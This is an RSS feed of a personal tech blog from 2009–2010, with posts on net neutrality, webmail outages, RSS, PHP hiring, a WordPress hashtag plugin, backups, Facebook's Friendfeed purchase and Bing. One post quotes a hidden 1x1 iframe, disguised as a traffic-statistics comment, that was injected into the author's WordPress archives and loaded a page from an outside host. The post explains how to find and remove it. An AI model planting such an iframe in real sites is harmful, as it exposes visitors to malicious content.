<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>meta BLOG &#187; Aziz Poonawalla</title>
	<atom:link href="http://www.metablog.us/author/admin/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.metablog.us</link>
	<description>blogging about blogging about</description>
	<lastBuildDate>Mon, 17 May 2010 18:20:36 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
		<item>
		<title>Glenn Beck&#8217;s crusade against Network Neutrality</title>
		<link>http://www.metablog.us/techsphere/glenn-becks-crusade-against-network-neutrality/</link>
		<comments>http://www.metablog.us/techsphere/glenn-becks-crusade-against-network-neutrality/#comments</comments>
		<pubDate>Mon, 17 May 2010 18:20:36 +0000</pubDate>
		<dc:creator>Aziz Poonawalla</dc:creator>
				<category><![CDATA[techsphere]]></category>
		<category><![CDATA[internet]]></category>
		<category><![CDATA[network neutrality]]></category>

		<guid isPermaLink="false">http://www.metablog.us/?p=180</guid>
		<description><![CDATA[Glenn Beck has decided Net Neutrality is the tool of the devil. Thank god that we have a functioning techsphere, which serves as a factual counterpoint to nonsense and propaganda. The lack of any such objective source in the political blogsphere is basically the reason that I started geekblogging. Still, sometimes, the political stoopid finds [...]<p>Post from: <a href="http://www.metablog.us">meta BLOG</a><br/><br/><a href="http://www.metablog.us/techsphere/glenn-becks-crusade-against-network-neutrality/">Glenn Beck&#8217;s crusade against Network Neutrality</a></p>
]]></description>
			<content:encoded><![CDATA[<p></p><p>Glenn Beck has decided <a href="http://arstechnica.com/tech-policy/news/2010/05/glenn-becks-war-on-the-fcc-and-satan-worshippers.ars">Net Neutrality is the tool of the devil</a>. </p>
<p>Thank god that we have a functioning techsphere, which serves as a factual counterpoint to nonsense and propaganda. The lack of any such objective source in the political blogsphere is basically the reason that I started geekblogging. Still, sometimes, the political stoopid finds you, no matter how far you run. </p>
<p>In a nutshell, <a href="http://www.haibane.info/2010/04/23/heres-why-net-neutrality-is-important/">this is why network neutrality matters</a>. </p>
<p>Post from: <a href="http://www.metablog.us">meta BLOG</a><br/><br/><a href="http://www.metablog.us/techsphere/glenn-becks-crusade-against-network-neutrality/">Glenn Beck&#8217;s crusade against Network Neutrality</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.metablog.us/techsphere/glenn-becks-crusade-against-network-neutrality/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>annoying html injection in wordpress</title>
		<link>http://www.metablog.us/blogging/annoying-html-injection-in-wordpress/</link>
		<comments>http://www.metablog.us/blogging/annoying-html-injection-in-wordpress/#comments</comments>
		<pubDate>Sun, 13 Sep 2009 11:16:13 +0000</pubDate>
		<dc:creator>Aziz Poonawalla</dc:creator>
				<category><![CDATA[blogging]]></category>
		<category><![CDATA[hackers]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://www.metablog.us/?p=176</guid>
		<description><![CDATA[two of my old posts at my geekblog Haibane.info dating from November 2007 had some injected HTML code in them. The injected code read as follows: &#60;!-- Traffic Statistics --&#62; &#60;iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0&#62;&#60;/iframe&#62; &#60;!-- End Traffic Statistics --&#62; I only became aware of it when Google flagged my archives for that month as [...]<p>Post from: <a href="http://www.metablog.us">meta BLOG</a><br/><br/><a href="http://www.metablog.us/blogging/annoying-html-injection-in-wordpress/">annoying html injection in wordpress</a></p>
]]></description>
			<content:encoded><![CDATA[<p></p><p>two of my old posts at my geekblog Haibane.info dating from <a href="http://www.haibane.info/2007/11/">November 2007</a> had some injected HTML code in them. The injected code read as follows:</p>
<p><code>&lt;!-- Traffic Statistics --&gt; &lt;iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0&gt;&lt;/iframe&gt; &lt;!-- End Traffic Statistics --&gt;</code></p>
<p>I only became aware of it when Google flagged my archives for that month as &#8220;malicious&#8221;. Viewing source of the archives page revealed the hack &#8211; probably from some window of time in which I hadnt upgraded to the latest wordpress version.</p>
<p>To ensure you don&#8217;t have old posts in your archives with this exploit, just search your posts for the term &#8220;iframe&#8221;. Edit those posts and you&#8217;ll likely as not find similar code to above. </p>
<p>WordPress has come a long way in making upgrades easier with one click (though some people still run into problems on occasion). I think it would be better is WP had a incremental and automated upgrade process whereby whenever a security-related update was available, you could have it automatically install, just like you can set in Windows. Ideally, this would be controlled by a setting in the Dashboard to &#8220;turn on/off automatic security patches&#8221; and when enabled, would &#8220;register&#8221; your blog with the mothership at wordpress.org so that whenever a security patch is available, you get an automatic email to your admin email account notifying you, and when you next login to Dashboard the patch is automatically applied. </p>
<p>Post from: <a href="http://www.metablog.us">meta BLOG</a><br/><br/><a href="http://www.metablog.us/blogging/annoying-html-injection-in-wordpress/">annoying html injection in wordpress</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.metablog.us/blogging/annoying-html-injection-in-wordpress/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>First gmail, now Yahoo mail is down</title>
		<link>http://www.metablog.us/cloudware/first-gmail-now-yahoo-mail-is-down/</link>
		<comments>http://www.metablog.us/cloudware/first-gmail-now-yahoo-mail-is-down/#comments</comments>
		<pubDate>Thu, 03 Sep 2009 10:58:24 +0000</pubDate>
		<dc:creator>Aziz Poonawalla</dc:creator>
				<category><![CDATA[cloudware]]></category>
		<category><![CDATA[email]]></category>
		<category><![CDATA[Gmail]]></category>
		<category><![CDATA[yahoo]]></category>

		<guid isPermaLink="false">http://www.metablog.us/?p=171</guid>
		<description><![CDATA[good grief, it looks like it&#8217;s Yahoo Mail&#8217;s turn to go down in flames: I&#8217;m sure they will have service restored soon. But it&#8217;s particularly more galling given that 1. I snarkily defended Yahoo Mail during the gmail outage (oh, karma!) and 2. unlike gmail, I&#8217;m a paying customer for Yahoo&#8217;s Plus service (no ads, [...]<p>Post from: <a href="http://www.metablog.us">meta BLOG</a><br/><br/><a href="http://www.metablog.us/cloudware/first-gmail-now-yahoo-mail-is-down/">First gmail, now Yahoo mail is down</a></p>
]]></description>
			<content:encoded><![CDATA[<p></p><p>good grief, it looks like it&#8217;s Yahoo Mail&#8217;s turn to go down in flames:<br />
<div id="attachment_172" class="wp-caption aligncenter" style="width: 300px">
	<img src="http://www.metablog.us/wp-content/uploads/2009/09/ymail-300x204.png" alt="Yahoo Mail error message" title="ymail" width="300" height="204" class="size-medium wp-image-172" />
	<p class="wp-caption-text">Yahoo Mail error message</p>
</div></p>
<p>I&#8217;m sure they will have service restored soon. But it&#8217;s particularly more galling given that 1. I <a href="http://twitter.com/azizhp/status/3697315702">snarkily defended Yahoo Mail</a> during the gmail outage (oh, karma!) and 2. unlike gmail, I&#8217;m a paying customer for Yahoo&#8217;s Plus service (no ads, more storage, extra features including mail aliases). </p>
<p>This, in a nutshell, is why the Cloud sucks. But even these hassles aren&#8217;t enough to make me want to go back to the Eudora days where I had to manage my own mail archives locally. Email is inherently a pain no matter how you do it &#8211; the only real way to be free of it is to <a href="http://www.metablog.us/social/declaration-of-email-independence/">declare Email Independence</a>. </p>
<p>Post from: <a href="http://www.metablog.us">meta BLOG</a><br/><br/><a href="http://www.metablog.us/cloudware/first-gmail-now-yahoo-mail-is-down/">First gmail, now Yahoo mail is down</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.metablog.us/cloudware/first-gmail-now-yahoo-mail-is-down/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>RSS is dead; long live RSS!</title>
		<link>http://www.metablog.us/content/rss-is-dead-long-live-rss/</link>
		<comments>http://www.metablog.us/content/rss-is-dead-long-live-rss/#comments</comments>
		<pubDate>Tue, 01 Sep 2009 13:28:00 +0000</pubDate>
		<dc:creator>Aziz Poonawalla</dc:creator>
				<category><![CDATA[content]]></category>
		<category><![CDATA[RSS]]></category>

		<guid isPermaLink="false">http://www.metablog.us/content/rss-is-dead-long-live-rss/</guid>
		<description><![CDATA[I was quite perplexed to see this article at ZDNet on techmeme, arguing that RSS is a failure. Now, I&#8217;ve been relying less and less on Google Reader myself as a source of news as well, but that&#8217;s not because of a failure in RSS technology but rather the obsolesence of Google Reader in the [...]<p>Post from: <a href="http://www.metablog.us">meta BLOG</a><br/><br/><a href="http://www.metablog.us/content/rss-is-dead-long-live-rss/">RSS is dead; long live RSS!</a></p>
]]></description>
			<content:encoded><![CDATA[<p></p><p>I was quite perplexed to see this article at ZDNet on techmeme, arguing that <a href="http://blogs.zdnet.com/BTL/?p=23276">RSS is a failure</a>. Now, I&#8217;ve been relying less and less on Google Reader myself as a source of news as well, but that&#8217;s not because of a failure in RSS technology but rather the obsolesence of Google Reader in the Twitter age. Marshall Kirkpatrick of RWW has a response, arguing that RSS isn&#8217;t dead but just <a href="http://marshallk.com/if-you-think-rss-is-dead-then-thats-your-loss-and-its-a-big-one">one of many information-delivery mechanisms</a> he relies on; I think this response misses the point, however. The truth is that RSS has become an infrastructure technology, the glue that binds the web together and makes it useful. <a href="http://pipes.yahoo.com/">Yahoo Pipes</a> was a great example of how RSS could be used to manipulate content, and half the functionality of Twitter itself comes from the ability to use RSS to import content to it. Friendfeed also relies on RSS feeds generated from your social sphere, and Facebook has supported importing of RSS feeds for a while. The point here is that RSS is so prevalent it has become invisible. Yes, you can tap the raw stream of RSS content directly, using Google Reader or equivalent, but that&#8217;s like drinking from the firehose. The better approach is to let your social graph do the filtering for you and then present the result as a steady stream (the so-called <a href="http://www.reallysimplesyndication.com/riverOfNews">river of news</a>). That stream is content, but the streambed is RSS.</p>
<p>Related: Dave Winer makes much the same point, that &#8220;<a href="http://www.scripting.com/stories/2009/08/26/rssIsHowTheNewsFlows.html">the Internet is layered</a>.&#8221; Also see James Robertson&#8217;s comments about <a href="http://www.cincomsmalltalk.com/blog/blogView?showComments=true&#038;printTitle=When_Everything_Looks_like_a_Hammer...&#038;entry=3429401973">the closed tech pundit circle</a>.</p>
<p>Post from: <a href="http://www.metablog.us">meta BLOG</a><br/><br/><a href="http://www.metablog.us/content/rss-is-dead-long-live-rss/">RSS is dead; long live RSS!</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.metablog.us/content/rss-is-dead-long-live-rss/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>a perplexing paucity of PHP programmers</title>
		<link>http://www.metablog.us/techsphere/a-perplexing-paucity-of-php-programmers/</link>
		<comments>http://www.metablog.us/techsphere/a-perplexing-paucity-of-php-programmers/#comments</comments>
		<pubDate>Thu, 27 Aug 2009 13:28:00 +0000</pubDate>
		<dc:creator>Aziz Poonawalla</dc:creator>
				<category><![CDATA[techsphere]]></category>
		<category><![CDATA[India]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[programming]]></category>

		<guid isPermaLink="false">http://www.metablog.us/techsphere/a-perplexing-paucity-of-php-programmers/</guid>
		<description><![CDATA[My friend Abbas Ali, who is one of the lead programmers for the open-source Coppermine gallery project, writes with mild frustration about the seeming shortage of talented PHP programmers in India. He cites a number of reasons, one of which is a lack of good trainers: Unfortunately in India you need a trainer for learning [...]<p>Post from: <a href="http://www.metablog.us">meta BLOG</a><br/><br/><a href="http://www.metablog.us/techsphere/a-perplexing-paucity-of-php-programmers/">a perplexing paucity of PHP programmers</a></p>
]]></description>
			<content:encoded><![CDATA[<p></p><p>My friend Abbas Ali, who is one of the lead programmers for the open-source <a href="http://coppermine-gallery.net/">Coppermine</a> gallery project, writes with mild frustration about the seeming <a href="http://www.abbasali.net/blog/2009/08/27/dearth-of-good-php-programmers/">shortage of <em>talented</em> PHP programmers in India</a>. He cites a number of reasons, one of which is a lack of good trainers:</p>
<blockquote><p>Unfortunately in India you need a trainer for learning programming languages. No one is willing to learn on his/her own. As soon as a student goes to university, (s)he starts to search for training institutes. There are very few training institutes offering PHP courses and I will say none of them are good (at least in Nagpur). The sole reason is that the trainer himself/herself is not adept at PHP.</p>
</blockquote>
<p>This is surprising to me. Certainly the vast majority of programmers in the US I know are self-taught, especially the web-centric ones who sling PHP and SQL code around all day. The availability of numerous and inexpensive training manuals (notably the O&#8217;Reilly series) seems to foster a DIY mentality towards picking up a new language, though neraly everyone has of ocurse had at least one programming ocurse in college even if they aren&#8217;t formal CS majors (and few are). Are there no such eequivalent resources available in the Indian market? Or is there a cultural difference at play here? Either way, it seems like there&#8217;s an opportunity of some sort to rectify this situation. There&#8217;s a vast amount of PHP and SQL based web application development going on, especially around the Twitter and WordPress ecosystems. Then again, James and crew over at <a href="http://wpmu.org/">WPMU.org</a> are also always trying to recruit talent, too, so I wonder if the problem isn&#8217;t limited to India.</p>
<p>In fact, looking at my own example, my own knowledge of these technologies is pretty basic. I have written two plugins, one of which makes some vey nominal SQL calls and the other which is just a few simple PHP functions strung together, leveraging the hooks and wordpress API. I doubt very much that I&#8217;d come close to a &#8220;talented&#8221; PHP programmer of the sort Abbas&#8217; company and others are looking for. Perhaps the depth of PHP knowledge is shallow overall and deep in only a few places, in which case Abbas has hit upon an observation that is truly global. If the depth of PHP and SQL knowledge could be increased across a broader swath of the talent pool, would we see an explosion of even better apps?</p>
<p>It certainly feels like there isn&#8217;t much technical innovation going on in the web right now. The only person out there in the tech punditsphere who actually gets his hands dirty and tinkers with code is <a href="http://scripting.com/">Dave Winer</a>, and he has built <a href="http://dave.40twits.com/">some really</a> <a href="http://rsscloud.org/">elegant things</a>. Also I was really quite impressed with Joe Moreno&#8217;s <a href="http://blog.adjix.com/2009/08/own-your-links-with-adjix-link-bucket.html">URL-shortener solution</a>. These sorts of things require broader knowledge than just PHP and SQL, such as DNS mapping. Most of the new sites that spring up covered by TechCrunch seem to be simple ideas implemented cleverly, but nothing really innovative seems to have come down the pike since, well, Twitter. Is the web industry stagnant for lack of talent overall?</p>
<p>Post from: <a href="http://www.metablog.us">meta BLOG</a><br/><br/><a href="http://www.metablog.us/techsphere/a-perplexing-paucity-of-php-programmers/">a perplexing paucity of PHP programmers</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.metablog.us/techsphere/a-perplexing-paucity-of-php-programmers/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Tags to Hashtags #wp</title>
		<link>http://www.metablog.us/blogging/tags-to-hashtags/</link>
		<comments>http://www.metablog.us/blogging/tags-to-hashtags/#comments</comments>
		<pubDate>Fri, 21 Aug 2009 10:34:16 +0000</pubDate>
		<dc:creator>Aziz Poonawalla</dc:creator>
				<category><![CDATA[blogging]]></category>
		<category><![CDATA[social]]></category>
		<category><![CDATA[#wp]]></category>
		<category><![CDATA[plugins]]></category>
		<category><![CDATA[taxonomy]]></category>
		<category><![CDATA[twitter]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://www.metablog.us/?p=160</guid>
		<description><![CDATA[I&#8217;ve written a new plugin for wordpress entitled &#8220;AHP Tags to Hashtags&#8221; for use with WordPress and WordPress MU. The plugin can be found for now at pastebin here, I will update when it&#8217;s been added to the official wordpress plugin repository. The plugin appends the tags for each post to the post title in [...]<p>Post from: <a href="http://www.metablog.us">meta BLOG</a><br/><br/><a href="http://www.metablog.us/blogging/tags-to-hashtags/">Tags to Hashtags</a></p>
]]></description>
			<content:encoded><![CDATA[<p></p><p>I&#8217;ve written a new plugin for wordpress entitled &#8220;AHP Tags to Hashtags&#8221; for use with WordPress and WordPress MU. The plugin can be found for now <a href="http://azizhp.pastebin.com/f3a08d09c">at pastebin here</a>, I will update when it&#8217;s been added to the official wordpress plugin repository.</p>
<p>The plugin appends the tags for each post to the post title in the RSS feed. For example, for a post titled &#8220;Awesome post&#8221; which is tagged with &#8220;Amazing, Awesome, Super awesome&#8221;, the RSS feed will show the post titles as &#8220;Awesome post #Amazing #Awesome #Superawesome&#8221;. Note that spaces in a tag are removed, and hash symbols (#) are prepended to each.</p>
<p>This plugin is useful primarily to bloggers who pipe their posts into Twitter. The post tags become Twitter hashtags. Since post tags and twitter hashtags are both a form of metadata, it is natural to simply and automatically reuse the one for the other. </p>
<p>Consider a blog post on the Iran election. Normally youd tag the post Iran and then when you tweet it, youd have to manually insert the twitter hashtag #iranelection. Now, you can simply tag the post iranelection (no # symbol) and it will automatically be hashtagged. Combined with a service like <a href="http://twitterfeed.com">Twitterfeed</a>, this plugin can greatly automate the process of piping relevant posts into the twitterverse.</p>
<p>Note that the plugin makes no attempt to check that the total length of the post title, including hashtags, falls within the 140-character limit imposed by Twitter. </p>
<p>At present the plugin has no options. The feature roadmap includes the following:<br />
- add title character length checking<br />
- toggle using tags or categories for conversion to hashtags<br />
- let user decide whether to remove spaces in tags, or convert to underlines or other character</p>
<p>this is a pretty simple plugin so other feature requests are appreciated. </p>
<p>UPDATE: version 2.0 of the plugin is <a href="http://azizhp.pastebin.com/m2a802265">at pastebin here</a>. This version no longer appends all tags, but only those already beginning with #. This way the blogger can selectively choose which tags they want converted into hashtags. </p>
<p>Post from: <a href="http://www.metablog.us">meta BLOG</a><br/><br/><a href="http://www.metablog.us/blogging/tags-to-hashtags/">Tags to Hashtags</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.metablog.us/blogging/tags-to-hashtags/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>backups should be local, not to the cloud</title>
		<link>http://www.metablog.us/blogging/backups-should-be-local-not-to-the-cloud/</link>
		<comments>http://www.metablog.us/blogging/backups-should-be-local-not-to-the-cloud/#comments</comments>
		<pubDate>Wed, 12 Aug 2009 16:16:39 +0000</pubDate>
		<dc:creator>Aziz Poonawalla</dc:creator>
				<category><![CDATA[blogging]]></category>

		<guid isPermaLink="false">http://www.metablog.us/?p=156</guid>
		<description><![CDATA[One of the lessons of Friendfeed&#8217;s buyout by Facebook is that the cloud is not a good place for backup. In an era of the sub-$100 terabyte, the idea that the best place for our data should be anywhere other than right at home is a strange one. Cloud backup is useful as a meta-backup [...]<p>Post from: <a href="http://www.metablog.us">meta BLOG</a><br/><br/><a href="http://www.metablog.us/blogging/backups-should-be-local-not-to-the-cloud/">backups should be local, not to the cloud</a></p>
]]></description>
			<content:encoded><![CDATA[<p></p><p>One of the lessons of Friendfeed&#8217;s buyout by Facebook is that the cloud is not a good place for backup. In an era of the sub-$100 terabyte, the idea that the best place for our data should be anywhere other than right at home is a strange one. Cloud backup is useful as a meta-backup &#8211; for example, using Jungledisk and Amazon&#8217;s S3 service to backup your local backups &#8211; to guard against catastrophe, but should never be your primary repository. </p>
<p>For data like photos, this is pretty much a moot point, as everyone keeps their originals on their disk and uploads select photos to Flickr/Picasa etc (and at lower resolution than the originals). But for text, like blog posts and tweets, most people simply leave their content in the cloud &#8211; which includes leaving your wordpress database at your hosting provider rather than on your local disk. I haven&#8217;t yet found a good solution for local wordpress database backups but I have written previously about <a href="http://www.metablog.us/blogging/backing-up-your-tweets/">various backup strategies for twitte</a>r. Sarah Perez at RWW just did a piece on <a href="http://www.readwriteweb.com/archives/10_ways_to_archive_your_tweets.php">10 ways to archive your tweets</a> as well, but most of these are again cloud-based solutions. Marshall Kirkpatrick has a guide to <a href="http://www.readwriteweb.com/archives/how_to_backup_and_search_all_your_friends_tweets_i.php">using Google Reader</a> along with Dave Winer&#8217;s new OPML tool to consolidate all your tweets and your friends&#8217; tweets, but this isn&#8217;t a true backup solution either, as <a href="http://www.readwriteweb.com/archives/how_to_backup_and_search_all_your_friends_tweets_i.php#comment-151971">I point out</a> in comments. The point however is as long as the data is in the cloud, it&#8217;s not really backed up &#8211; data wants to be imprisoned, not set free.</p>
<p>Post from: <a href="http://www.metablog.us">meta BLOG</a><br/><br/><a href="http://www.metablog.us/blogging/backups-should-be-local-not-to-the-cloud/">backups should be local, not to the cloud</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.metablog.us/blogging/backups-should-be-local-not-to-the-cloud/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>true blue: facebook friends friendfeed, whales on twitter</title>
		<link>http://www.metablog.us/social/facebook-friends-friendfeed-to-whale-on-twitter/</link>
		<comments>http://www.metablog.us/social/facebook-friends-friendfeed-to-whale-on-twitter/#comments</comments>
		<pubDate>Mon, 10 Aug 2009 19:25:50 +0000</pubDate>
		<dc:creator>Aziz Poonawalla</dc:creator>
				<category><![CDATA[social]]></category>
		<category><![CDATA[facebook]]></category>
		<category><![CDATA[friendfeed]]></category>
		<category><![CDATA[statusphere]]></category>
		<category><![CDATA[twitter]]></category>

		<guid isPermaLink="false">http://www.metablog.us/?p=133</guid>
		<description><![CDATA[This is potentially huge &#8211; Facebook has acquired Friendfeed: Obviously Facebook has already built out some of FriendFeed’s functionality so there is some overlap, but there are still numerous ways FriendFeed beats out Facebook’s News Feed setup. One of these is the way stories are ‘floated’ to the top as new users comment on them. [...]<p>Post from: <a href="http://www.metablog.us">meta BLOG</a><br/><br/><a href="http://www.metablog.us/social/facebook-friends-friendfeed-to-whale-on-twitter/">true blue: facebook friends friendfeed, whales on twitter</a></p>
]]></description>
			<content:encoded><![CDATA[<p></p><p><div id="attachment_139" class="wp-caption alignnone" style="width: 200px">
	<img src="http://www.metablog.us/wp-content/uploads/2009/08/blue-heart1.jpg" alt="Facebook is now in a relationship with Friendfeed. It&#039;s complicated." title="blue-heart1" width="240" height="210" class="size-full wp-image-139" />
	<p class="wp-caption-text">Facebook is now in a relationship with Friendfeed. It's complicated.</p>
</div>This is potentially huge &#8211; <a href="http://www.techcrunch.com/2009/08/10/facebook-acquires-friendfeed/">Facebook has acquired Friendfeed</a>:</p>
<blockquote><p>Obviously Facebook has already built out some of FriendFeed’s functionality so there is some overlap, but there are still numerous ways FriendFeed beats out Facebook’s News Feed setup. One of these is the way stories are ‘floated’ to the top as new users comment on them. And FriendFeed’s system is truly real-time, unlike Facebook’s feed which users have to manually refresh.</p>
<p>But the biggest win here for Facebook is the FriendFeed team, which includes an all-star cast of ex-Googlers.</p></blockquote>
<p>Still very much a breaking news story but I am sure the Techcrunch folks will <a href="http://www.techcrunch.com/2009/08/10/facebook-acquires-friendfeed/">update with more info</a> as they get it. </p>
<p>The obvious motivation here is to pound on Twitter&#8217;s &#8220;statusphere&#8221; market share. The big drawback of FF until now was that it was just a &#8220;better Twitter&#8221; &#8211; but without Twitter, 90% of the purpose of using Friendfeed was essentially rendered moot (as was the case with the DDOS attack over the weekend). But by folding in FF&#8217;s feedslurping uber-twitter capability, Facebook can create a one-stop shop, making all facebook users who are also on twitter stay within facebook for their twittering, which of course keeps them in control of the ad viewing. A souped-up Friendfeed application for Facebook seems likely; or even more likely, a new default Facebook tab (&#8220;Feeds&#8221; ?). This is technology that the Facebook people are going to want to put front and center. </p>
<p>The adoption of FF-ish features like commenting on everything and &#8220;Likes&#8221; are also unique to the FB/FF ecosystem and these should be integrated. Even google got into the &#8220;Likes&#8221; act so I think Twitter is going to have to respond to this by introducing that feature at least (which would incidentally be useful in meta-twitter metrics of who to follow and whatnot). I also don&#8217;t see how Twitter can resist the inevitable &#8220;groups&#8221; feature to compete with Friendfeed&#8217;s Rooms. I actually use Rooms to power virtual groups on Twitter like @<a href="http://twitter.com/otakusphere">otakusphere</a>. </p>
<p>Twitter has serious catch-up to do, feature-wise, but until now they haven&#8217;t felt any real competitive pressure because no one else had the numbers to threaten them. With Facebook&#8217;s takeover of Friendfeed, however, the game has just changed dramatically.</p>
<p>UPDATE: It&#8217;s confirmed: <a href="http://www.readwriteweb.com/archives/facebook_just_bought_friendfeed.php">Facebook and Friendfeed are now in a relationship. It&#8217;s complicated</a>.</p>
<p>Post from: <a href="http://www.metablog.us">meta BLOG</a><br/><br/><a href="http://www.metablog.us/social/facebook-friends-friendfeed-to-whale-on-twitter/">true blue: facebook friends friendfeed, whales on twitter</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.metablog.us/social/facebook-friends-friendfeed-to-whale-on-twitter/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Microsoft Bing: But It &#8216;s Not Google!</title>
		<link>http://www.metablog.us/cloudware/microsoft-bing-but-it-s-not-google/</link>
		<comments>http://www.metablog.us/cloudware/microsoft-bing-but-it-s-not-google/#comments</comments>
		<pubDate>Mon, 13 Jul 2009 13:50:43 +0000</pubDate>
		<dc:creator>Aziz Poonawalla</dc:creator>
				<category><![CDATA[cloudware]]></category>
		<category><![CDATA[google]]></category>
		<category><![CDATA[internet]]></category>
		<category><![CDATA[microsoft]]></category>
		<category><![CDATA[search engine]]></category>

		<guid isPermaLink="false">http://www.metablog.us/cloudware/microsoft-bing-but-it-s-not-google/</guid>
		<description><![CDATA[I&#8217;ve been increasingly using Microsoft&#8217;s new search engine, Bing in lieu of Google for my casual searches. One of the things that appeals to me is how the search results are so much more organized and comprehensive than just a list of ten text items. Google&#8217;s spartan deisgn was cool and chic ten years ago [...]<p>Post from: <a href="http://www.metablog.us">meta BLOG</a><br/><br/><a href="http://www.metablog.us/cloudware/microsoft-bing-but-it-s-not-google/">Microsoft Bing: But It &#8216;s Not Google!</a></p>
]]></description>
			<content:encoded><![CDATA[<p></p><p>I&#8217;ve been increasingly using Microsoft&#8217;s new search engine, Bing in lieu of Google for my casual searches. One of the things that appeals to me is how the search results are so much more organized and comprehensive than just a list of ten text items. Google&#8217;s spartan deisgn was cool and chic ten years ago but today it feels increasingly stale, and Bing is pulling from Apple&#8217;s playbook in tailoring the interface to users&#8217; needs. Some examples: saved searches are essential for keeping track of what you&#8217;ve been researching, and the live preview of video thumbnails on mouseover saves you a click &#8211; and getting video and photos along with text links on the same search results page is a huge timesaver. I feel like I spend less time using Bing. Right now I stil have to manually decide to go to Bing but I intend to switch the default search engine on all my browsers for a few weeks &#8211; including Chrome &#8211; and see how that works out.</p>
<p>Bing has been getting a lot of attention lately &#8211; there&#8217;s a <a href="http://www.nytimes.com/2009/07/09/technology/personaltech/09pogue.html?_r=3&amp;hpw">piece on it in the New York Times</a>, another <a href="http://www.usatoday.com/tech/columnist/edwardbaig/2009-07-01-google-vs-Bing_N.htm">in USA Today</a>, and even a website, <a href="http://bing-vs-google.com/">Bing Vs Google</a>, that lets you see searches compared side-by-side. It&#8217;s good to shake things up &#8211; and Bing certainly has its rough spots, ut just like Google these should improve over time. The mere existence of Bing ensures that Google is forced to compete and innovate as well.</p>
<p>Post from: <a href="http://www.metablog.us">meta BLOG</a><br/><br/><a href="http://www.metablog.us/cloudware/microsoft-bing-but-it-s-not-google/">Microsoft Bing: But It &#8216;s Not Google!</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.metablog.us/cloudware/microsoft-bing-but-it-s-not-google/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>One Million Strong for @aplusk</title>
		<link>http://www.metablog.us/blogging/one-million-strong-for-aplusk/</link>
		<comments>http://www.metablog.us/blogging/one-million-strong-for-aplusk/#comments</comments>
		<pubDate>Fri, 17 Apr 2009 15:41:53 +0000</pubDate>
		<dc:creator>Aziz Poonawalla</dc:creator>
				<category><![CDATA[blogging]]></category>
		<category><![CDATA[ideas]]></category>
		<category><![CDATA[twitter]]></category>

		<guid isPermaLink="false">http://www.metablog.us/?p=129</guid>
		<description><![CDATA[Ashton Kutcher has done it &#8211; he has amassed one million followers. He&#8217;s using this publicity to donate mosquito nets to African children, but that&#8217;s just scratching the surface of what is possible. Use your imagination.. what could he do, with his combination of celebrity and follower clout? - he could raise money for a [...]<p>Post from: <a href="http://www.metablog.us">meta BLOG</a><br/><br/><a href="http://www.metablog.us/blogging/one-million-strong-for-aplusk/">One Million Strong for @aplusk</a></p>
]]></description>
			<content:encoded><![CDATA[<p></p><p>Ashton Kutcher has done it &#8211; he has <a href="http://twitter.com/aplusk/status/1542566115">amassed one million followers</a>. He&#8217;s using this publicity to donate mosquito nets to African children, but that&#8217;s just scratching the surface of what is possible. </p>
<p>Use your imagination.. what could  he do, with his combination of celebrity and follower clout?</p>
<p>- he could raise money for a politician or cause<br />
- he could single handedly launch a new brand or artist<br />
- he can function as a <a href="http://twitter.com/problogger/status/1529242141">one-man Digg</a> or Slashdot effect</p>
<p>but more importantly, he can actually influence the public sphere. Consider that twitter users are the elite, early adopters and opinion makers. Ashton Kuther can now promote ideas to this elite. He&#8217;s a nexus of potential memes. </p>
<p>This is a landmark day. We don&#8217;t know how yet, but we will. </p>
<p>Post from: <a href="http://www.metablog.us">meta BLOG</a><br/><br/><a href="http://www.metablog.us/blogging/one-million-strong-for-aplusk/">One Million Strong for @aplusk</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.metablog.us/blogging/one-million-strong-for-aplusk/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
